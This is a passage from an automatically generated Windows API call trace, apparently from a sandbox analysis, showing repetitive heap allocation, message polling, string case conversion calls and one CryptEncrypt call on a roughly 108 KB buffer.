0x24b1728 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.648] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.648] CharLowerBuffW (in: lpsz="byte[108832]", cchLength=0xc | out: lpsz="byte[108832]") returned 0xc [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.651] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.652] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.652] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.652] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.652] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.652] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0209.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.653] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3501db0*, pdwDataLen=0x8bef68*=0x1a918, dwBufLen=0x1a920 | out: pbData=0x3501db0*, pdwDataLen=0x8bef68*=0x1a920) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0209.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.657] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.657] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.657] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.657] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.657] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.657] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.657] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.658] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.658] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.658] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.659] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.659] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.659] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.659] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 